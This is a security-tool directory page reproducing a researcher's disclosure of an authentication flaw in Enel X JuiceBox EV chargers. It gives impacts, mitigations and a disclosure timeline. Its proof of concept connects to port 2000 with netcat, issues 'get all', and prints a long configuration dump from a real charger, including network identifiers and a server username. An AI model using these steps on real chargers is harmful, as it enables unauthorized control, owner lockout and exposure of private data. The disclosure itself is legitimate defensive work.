Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/dersecure/cve-2024-33676
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationInformation GatheringWireless SecurityHardware HackingPenetration TestingHardware SecurityLearning & EducationFirmware Analysis
GitHubdersecure/cve-2024-33676

CVE-2024-33676

Technical disclosure of CVE-2024-33676: weak authentication on Enel X JuiceBox EV chargers enabling PII extraction, settings manipulation, and OS file system access via Gecko OS interface on port 2000.

View Repository
181 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-33676

Weak authentication and authorization on Enel X JuiceBox Level 2 EV charger enables access to operating system functions and parameters.

Description

Users on the local EV charger WLAN network can extract PII, change settings, and manipulate the operating system file system. This is done by accessing the functions on a local Gecko OS interface on port 2000.

This information was presented on July 26, 2025 at BSides Albuquerque. The slides are here.

Product Details

Affected Vendor: Enel X Way Affected Product: JuiceBox Level 2 Charger

Footprint: Enel X Way (subsidiary of Italian utility and energy conglomerate) EV chargers

  • 25,000 JuiceBox commercial chargers (shopping malls, multifamily parking garages, etc.)
  • 100,000 residential JuiceBox chargers in North America

Affected Versions:

  • EMWERK-JB201-1.0.46, Gecko_OS-STANDARD-4.2.7-11064, WGM160P
  • EMWERK-JB201_OCPP_EZVOL-0.0.106, Gecko_OS-STANDARD-4.2.7-11064, WGM160P
  • EMWERK-JB201_OCPP_VOLTI-0.0.111, Gecko_OS-STANDARD-4.2.7-11064, WGM160P

Impact

Abusing JuiceBox Level 2 Charger Gecko OS programming interface:

  • Reboot or shutdown charger
  • Enable/disable services
  • Change remote terminal and website credentials (i.e., update password to lock out owner)
  • Upload and download files using the http functionality
  • Read and modify the Wi-Fi password allowing access to HAN/WLAN or ability to knock EV charger off the local Wi-Fi (e.g., no updates, no app access)
  • Adjust serial connections to sensors/actuators via I2C and GPIO configurations - safety concern?
  • Manipulate OCPP settings or falsify measurement information
  • Identify other Wi-Fi APs in the area
  • Discloses the location of the EV charger, e.g., using wigle.net and the BSSID (privacy risk)
  • Deface or disable the local website
  • Potentially lock legitimate users out of their system

CVSS

Suggested CVSS 4.0: 9.3 / Critical

  • Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/R:U

Mitigation

Option 1: Configure a remote terminal password

> set re w R3411yG00dEVCh4rg3rPa@@word
> save

Option 2: Disable with remote_terminal.enabled parameter

> set re e false
> save

NOTE: It appears the local website uses this command interface to populate it's information, so modifying these settings will likely make the local web service inoperable, e.g., gecko-os.js uses GET http://setup.com/command/get%20all.

Not-so-coordinated Disclosure

Timeline

  • 2023-06-30 - Created VINCE Report. Attempted to contact Enel X via email, website, and LinkedIn.
  • 2023-06-30 - Notified US co-op of exposed devices.
  • 2023-11-30 - CERT/CC unable to contact Enel X, says "At this point, I think it's best to apply for a CVE and go public."
  • 2024-4-25 - MITRE assigns CVE-2024-33676.
  • 2024-10-11 - Enel X Way announces it’s shutting down its North American charging business.
  • 2025-1-7 - VoltiE Group and partners acquire Enel X North America.
  • 2025-7-26 - Researcher discloses vulnerability at BSides Albuquerque.

Reporter

Jay Johnson at DER Security

(With a special thanks to Brian Wright at Sandia National Laboratories for support with this research.)

POC

If on the network with the EV Charger, an adversary can netcat to port 2000 and then interact with the equipment using the Gecko OS API commands.

For example, getting the Wi-Fi password, networking information, and other sensative information can be accomplished with get all.

$ nc 192.168.10.30 2000
EMWERK-JB201-1.0.46, Gecko_OS-STANDARD-4.2.7-11064, WGM160P
> get all
get all
app.debug.auto_run: 1
app.debug.ignore_settings: 0
app.info:
SDK version : 11064
Name : JBox_BT_Final.app
Size : 274852
Running : 1
broadcast.data: mac,bssid,channel,ip,ssid,rssi,remote_terminal_port,time,version,uuid
broadcast.http.host:
broadcast.interface: default
broadcast.interval: 10
broadcast.udp.ip: 255.255.255.255
broadcast.udp.local_port: 55555
broadcast.udp.remote_port: 55555
bus.command.read_timeout: 250
bus.command.rx_bufsize: 4096
bus.command.write_check_enabled: 0
bus.command.write_timeout: 25000
bus.data_bus: uart0
bus.log_bus: uart0
bus.mode: command
bus.stream.cmd_gpio: -1
bus.stream.cmd_seq: $$$
bus.stream.flush_count: 1460
bus.stream.flush_time: 20
bus.stream.flush_time_reset: 0
dfu.logs_enabled: 1
dfu.status: 0
dms.auto_start_enabled: 0
dms.bundle_id: 5fed5727-e67a-4a58-a0e0-e5da68e7f3fe
dms.cmd.enabled: 0
dms.connection.host: dfu.zentri.com
dms.connection.port: 443
dms.connection.timeout: 20
dms.interface: wlan
dms.product_id: ab92e1d2-632a-4939-afea-160d6beaf65d
dms.provision.status: 3
dms.telemetry.adc_mask: 0x0000
dms.telemetry.data_mask: 0x03FF
dms.telemetry.gpio_mask: 0x00000000
dms.telemetry.interval: 0
email.name_address: 0910042001280661727222696131
email.smtp.host:
email.smtp.password:
email.smtp.port: 587
email.smtp.username:
ethernet.auto_start.enabled: 0
ethernet.auto_start.retry_delay: 3
ethernet.dhcp.cache_enabled: 0
ethernet.dhcp.enabled: 1
ethernet.dhcp.hostname: gecko_os-#
ethernet.dhcp.timeout: 15
ethernet.link_detected_timeout: 7
ethernet.link_local.enabled: 0
ethernet.link_local.timeout: 20
ethernet.mac: 38:5C:FB:3A:B5:D2
ethernet.multicast.address: 0.0.0.0
ethernet.network.dns: 0.0.0.0
ethernet.network.gateway: 0.0.0.0
ethernet.network.ip: 0.0.0.0
ethernet.network.netmask: 0.0.0.0
ethernet.network.status: 0
ethernet.network.status_gpio: -1
ethernet.static.dns: 8.8.8.8
ethernet.static.gateway: 0.0.0.0
ethernet.static.ip: 0.0.0.0
ethernet.static.netmask: 255.255.255.0
gpio.alias:
! # Alias
gpio.init:
! # Description
gpio.sleep:
! # Description
gpio.usage:
! # Description
# 1 SPI1 CS
# 8 GPIO out
# 9 GPIO ipu
# 10 GPIO out
# 11 GPIO out
# 14 GPIO out
# 15 GPIO out
# 16 SPI16 CS
# 17 GPIO out
# 19 GPIO out
# 20 GPIO ipu
# 21 GPIO out
# 22 GPIO ood
# 23 UART0 TX
# 24 UART0 RX
# 25 GPIO out
# 26 GPIO out
http.client.retries: 3
http.client.retry_period: 1000
http.server.api_enabled: 1
http.server.auth_title:
http.server.cors_origin: 17EMOTORWERKS00030
http.server.denied_filename: webapp/unauthorized.html
http.server.enabled: 1
http.server.interface: default
http.server.keep_alive_enabled: 0
http.server.keep_alive_timeout: 300
http.server.max_clients: 6
http.server.notfound_filename:
http.server.password:
http.server.port: 80
http.server.root_filename: webapp/index.html
http.server.tls_cert:
http.server.tls_enabled: 0
http.server.tls_key:
http.server.tls_log_clients: 0
http.server.tls_peer_cert:
http.server.tls_verify_peer: 0
http.server.username: nmrx11.com.attz
http.server.ws_connected_gpio: -1
http.server.ws_data_gpio: -1
ioconn.control_gpio: -1
ioconn.enabled: 0
ioconn.local_port: 0
ioconn.protocol: tcp
ioconn.remote_host:
ioconn.remote_port: 0
ioconn.status_gpio: -1
mdns.enabled: 0
mdns.interface: default
mdns.name: gecko_os-#
mdns.service:
http - disabled
tcp - disabled
udp - disabled
remote_terminal - disabled
mdns.ttl: 300
network.arp.lock_enabled: 0
network.arp.table_size: 8
network.bridge.auto_start: 0
network.bridge.info: state: down
SSID: Gecko_OS-#
channel: 0
clients: 0
network.bridge.interface_1: none
network.bridge.interface_2: none
network.buffer.control_size: 8192
network.buffer.rxtx_ratio: 50
network.buffer.size: 61440
network.buffer.usage: RX:00,TX:05
network.default_interface: wlan
network.dns.timeout: 6000
network.tcp.delivery_type: normal
network.tls.ca_cert: godaddy_ca.pem
network.tls.ca_cert_verify_enabled: 1
network.tls.client_cert:
network.tls.client_key:
network.tls.handshake_timeout: 15
network.tls.version: 12
ntp.enabled: 1
Download Tool